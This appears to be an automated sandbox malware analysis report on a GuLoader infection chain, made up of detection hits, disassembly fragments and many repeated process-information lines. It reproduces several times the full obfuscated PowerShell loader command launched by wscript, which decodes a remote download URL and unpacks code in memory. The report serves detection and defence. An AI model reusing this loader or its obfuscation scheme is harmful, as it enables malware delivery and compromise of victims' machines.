              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbR source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thu", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000004.00000002.2329721255.000000000CC2B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2318228321.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2325090155.0000000008B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Oleraceous)$global:Subgroups = [System.Text.Encoding]::ASCII.GetString($Lhunds)$global:Kjortelens=$Subgroups.substring($Stealth,$Smeltediglen)<#skoleudgaven Medansvars Nidification C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Sjlevandringers $reprimanders $Nonhistoric), (ratificeringer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Forenames = [AppDomain]::CurrentDomain.GetAsse
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Viljekraft)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Lakridskonfekter, $false).DefineType($Tinpeste
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Oleraceous)$global:Subgroups = [System.Text.Encoding]::ASCII.GetString($Lhunds)$global:Kjortelens=$Subgroups.substring($Stealth,$Smeltediglen)<#skoleudgaven Medansvars Nidification C
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCing
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCing
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7E6F87 push esp; retf 1_2_00007FFD9B7E6F88
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B1DF7 push esp; retf 1_2_00007FFD9B8B1E0C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B1CE4 push esp; retf 1_2_00007FFD9B8B1CF9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07A308C2 push eax; mov dword ptr [esp], ecx4_2_07A30AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07A30AB8 push eax; mov dword ptr [esp], ecx4_2_07A30AC4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_038617B4 push es; iretd 9_2_038617B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_038637E4 pushfd ; ret 9_2_038637E6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_038647F3 push eax; retf 9_2_03864808
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03860FF1 push ss; iretd 9_2_0386100F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03861112 push edi; retf 9_2_0386113D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03861325 push edi; ret 9_2_03861342
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03865D34 push esp; retf 9_2_03865D35
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0386117C push esp; iretd 9_2_03861180
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0386409D push ss; ret 9_2_0386409E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03862ABD push cs; ret 9_2_03862ACF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_038652D4 pushad ; retf 9_2_038652D5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03861207 push ds; retf 9_2_0386120A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03863E28 push ecx; ret 9_2_03863E3D
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
